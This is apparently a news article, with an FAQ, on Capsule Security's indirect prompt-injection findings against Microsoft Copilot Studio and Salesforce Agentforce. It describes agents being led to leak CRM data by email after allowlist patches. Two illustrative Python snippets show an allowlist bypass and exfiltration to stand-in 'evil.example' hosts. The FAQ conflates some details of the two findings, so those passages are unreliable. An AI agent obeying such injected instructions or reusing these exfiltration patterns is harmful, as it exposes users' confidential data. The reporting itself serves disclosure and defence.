

Microsoft patches Copilot Studio prompt injection, data still exfiltrated


Microsoft has just rolled out a fix for a prompt‑injection flaw in its Copilot Studio platform, yet telemetry shows that sensitive information still slipped out of the system. The patch targets the same class of vulnerabilities that researchers have been flagging across AI‑driven code assistants for months. While the update blocks the most obvious injection paths, the incident raises a broader question: how many indirect routes remain viable after a vendor’s “quick fix”?

Earlier this year, independent labs demonstrated that even tightly controlled URL allowlists could be bypassed, suggesting that surface‑level defenses may not be enough. The latest findings from a team called Capsule add a new twist, showing that a variant of the attack persists despite prior mitigations. Their analysis points to a lingering vector that could keep data flowing to an external endpoint, even after the advertised patch is applied.
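Allowlist bypasses of this kind typically exploit loose URL matching. The sketch below is a generic illustration, not Salesforce's or Microsoft's actual implementation, and the hostnames are made up: substring matching approves an attacker-controlled host because the trusted domain appears inside it, while exact hostname comparison does not.

```python
from urllib.parse import urlparse

# Hypothetical allowlist; real products maintain their own trusted domains.
ALLOWED_HOSTS = {"images.example-crm.com"}

def naive_allowlist_check(url: str) -> bool:
    """Flawed: accepts any URL that merely contains a trusted domain."""
    return any(host in url for host in ALLOWED_HOSTS)

def strict_allowlist_check(url: str) -> bool:
    """Safer: parse the URL and compare the exact hostname."""
    return urlparse(url).hostname in ALLOWED_HOSTS

# The trusted domain is embedded as a subdomain of an attacker's host.
attacker_url = "https://images.example-crm.com.evil.example/leak?d=secret"

print(naive_allowlist_check(attacker_url))   # True  (bypassed)
print(strict_allowlist_check(attacker_url))  # False (blocked)
```

The design point: a check that treats the URL as a string rather than parsing it into components leaves the hostname under attacker control.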

That backdrop makes Capsule's parallel findings against Salesforce's Agentforce especially relevant.

Capsule is not the first research team to hit Agentforce with indirect prompt injection. Noma Labs disclosed ForcedLeak (CVSS 9.4) in September 2025, and Salesforce patched that vector by enforcing Trusted URL allowlists. According to Capsule's research, PipeLeak survives that patch through a different channel: email via the agent's authorized tool actions.
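The channel distinction matters: a Trusted URL allowlist inspects outbound links, while an agent's authorized tools, such as email, run through separate code paths. This minimal sketch mirrors the reported pattern only; all names are hypothetical and nothing here reflects any vendor's implementation. It shows how data blocked at the link layer can still exit through an authorized tool action.

```python
from urllib.parse import urlparse

ALLOWED_HOSTS = {"images.example-crm.com"}  # hypothetical trusted hosts
outbox = []  # stand-in for an email gateway the agent is authorized to use

def render_link(url: str) -> str:
    """Enforce the Trusted URL allowlist on rendered links."""
    if urlparse(url).hostname not in ALLOWED_HOSTS:
        raise ValueError("blocked by Trusted URL allowlist")
    return f'<a href="{url}">link</a>'

def send_email(to: str, body: str) -> None:
    """Authorized tool action: the link allowlist never runs on this path."""
    outbox.append((to, body))

secret = "CRM record: ACME Corp, renewal $1.2M"  # made-up example data

# The link channel is patched...
try:
    render_link("https://evil.example/?d=" + secret)
except ValueError:
    pass  # exfiltration via URL is blocked

# ...but injected instructions can route the same data through email.
send_email("attacker@evil.example", secret)
```

The takeaway matches Capsule's description: patching one exfiltration channel does not constrain the others an agent is already authorized to use.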

Naor Paz, CEO of Capsule Security, told VentureBeat the testing hit no exfiltration limit. "We did not get to any limitation," Paz said. "The agent would just continue to leak all the CRM." Salesforce recommended human-in-the-loop as a mitigation.

"If the human should approve every single operation, it's not really an agent," he told VentureBeat. "It's just a human clicking through the agent's actions."

Microsoft, for its part, patched Capsule's ShareLeak finding in Copilot Studio and assigned a CVE.

Microsoft’s rollout of a fix for CVE‑2026‑21520 shows the company can move quickly once a flaw is reported, yet the fact that data still left Copilot Studio raises questions about the patch’s scope. Coordinated disclosure with Capsule Security led to a January 15 deployment, followed by public disclosure on Wednesday. Capsule calls the assignment of a CVE to an indirect prompt‑injection issue “highly unusual,” which raises a broader question: does the CVE label reflect a shift in how such bugs are classified, or is it simply a procedural choice? And as Noma Labs’ earlier ForcedLeak work and Salesforce’s allowlist response show, mitigating one vector is no guarantee: Capsule reports that PipeLeak survived those defenses.

Whether Microsoft’s patch fully blocks the exfiltration path remains unclear; the lingering data loss suggests residual attack surface. The episode underscores that fixing one entry point may not eliminate all avenues for indirect prompt injection, and further scrutiny of Copilot Studio’s defenses appears warranted.


Common Questions Answered

How did Capsule Security discover the prompt injection vulnerability in Microsoft Copilot Studio?

Capsule Security researchers identified an indirect prompt injection vulnerability that could exfiltrate sensitive data through the agent's authorized tool actions. Their testing showed that even after Microsoft's patch, data could still leak through alternative channels.

What makes CVE-2026-21520 unique in the context of prompt injection vulnerabilities?

CVE-2026-21520 is considered highly unusual because it assigns a formal CVE number to an indirect prompt injection issue, a class of bug that rarely receives one. The vulnerability also demonstrates that even after obvious injection paths are patched, data exfiltration routes may remain in AI-driven platforms.

What did Naor Paz, CEO of Capsule Security, reveal about their testing of the Copilot Studio vulnerability?

Naor Paz stated that during their testing, they did not encounter any exfiltration limits, suggesting that the vulnerability could potentially expose significant amounts of sensitive information. This finding underscores the complexity of securing AI-driven code assistants against prompt injection attacks.